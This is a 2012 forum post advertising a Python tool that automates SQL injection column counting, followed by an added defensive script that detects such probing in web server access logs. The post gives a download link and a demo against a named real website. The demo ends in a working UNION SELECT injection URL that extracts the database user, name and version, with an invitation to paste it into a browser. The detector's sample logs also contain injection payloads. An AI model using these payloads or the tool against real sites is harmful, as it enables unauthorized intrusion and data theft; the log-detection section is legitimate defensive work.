aelius
Posted October 4, 2012 (edited)

[*] Description
The Full Automated Column Finder helps you to determine the correct amount of columns of the current SQL query. It is useful for SQL injection and saves you some time fuzzing manually.
After the correct amount of columns was found, a sample URL for exploiting the SQL injection vulnerability can be displayed.

[*] Download
http://xenuser.org/tools/column_finder.py

[*] Author webpage
Ascii for Breakfast

[*] Source
Full Automated Column Finder for SQL Injection

[*] Demo
hp work # python column_finder.py -u "http://www.mida.ro/content.php?id=21"
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Full Automated Column Finder for SQL Injection
by Valentin Hoebel (valentin@xenuser.org)
Version: 1.1 (23th May 2010)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
>> Checking if connection can be established...
>> Connected to target! URL seems to be valid.
>> Trying to find the correct number of columns...
>> Correct number of columns found!
>> Amount: 4
>> Do you want to have a sample URL for exploiting? (Yes/No) Yes
http://www.mida.ro/content.php?id=21+AND+1=2+UNION+SELECT+concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version())--
Simply copy and paste this link into your browser
Have fun! Bye

Edited October 4, 2012 by aelius
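For defenders, automated column counting of this kind can be flagged in web server access logs. The following is an added example, not part of the original post or of column_finder.py; it assumes the probing appears as UNION SELECT requests whose column count changes from request to request (the post does not show the tool's probe requests), and the log lines, addresses, paths and function names are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [04/Oct/2012:10:00:01 +0000] "GET /item.php?id=7+AND+1=2+UNION+SELECT+1-- HTTP/1.1" 200 512
198.51.100.7 - - [04/Oct/2012:10:00:02 +0000] "GET /item.php?id=7+AND+1=2+UNION+SELECT+1,2-- HTTP/1.1" 200 512
198.51.100.7 - - [04/Oct/2012:10:00:03 +0000] "GET /item.php?id=7+AND+1=2+UNION+SELECT+1,2,3-- HTTP/1.1" 200 512
198.51.100.7 - - [04/Oct/2012:10:00:04 +0000] "GET /item.php?id=7+AND+1=2+UNION+SELECT+concat(user(),1),2,3,4-- HTTP/1.1" 200 900
203.0.113.9 - - [04/Oct/2012:10:00:05 +0000] "GET /item.php?id=7 HTTP/1.1" 200 4096
203.0.113.9 - - [04/Oct/2012:10:00:06 +0000] "GET /search.php?q=trade+union+select+committee HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.+)", re.I | re.S)

def union_column_count(target):
    """Count top-level expressions in a UNION SELECT found in the query string."""
    match = UNION.search(unquote_plus(urlsplit(target).query))
    if not match:
        return None
    # Stop at a SQL comment or FROM clause, then count commas outside parentheses.
    select_list = re.split(r"--|#|/\*|\bfrom\b", match.group(1), maxsplit=1, flags=re.I)[0]
    depth, columns = 0, 1
    for ch in select_list:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth = max(depth - 1, 0)
        elif ch == "," and depth == 0:
            columns += 1
    return columns

def find_column_probing(log_text, min_steps=3):
    """Return {(client, path): sorted column counts} for clients that tried
    at least min_steps different UNION SELECT widths against one path."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        columns = union_column_count(target)
        if columns is not None:
            seen[(client, urlsplit(target).path)].add(columns)
    return {key: sorted(v) for key, v in seen.items() if len(v) >= min_steps}

if __name__ == "__main__":
    for (client, path), widths in find_column_probing(SAMPLE_LOG).items():
        print(f"{client} probed {path} with UNION SELECT widths {widths}")
```

The `min_steps` threshold keeps a single request that merely contains the words "union select", such as the constructed search query above, from being reported.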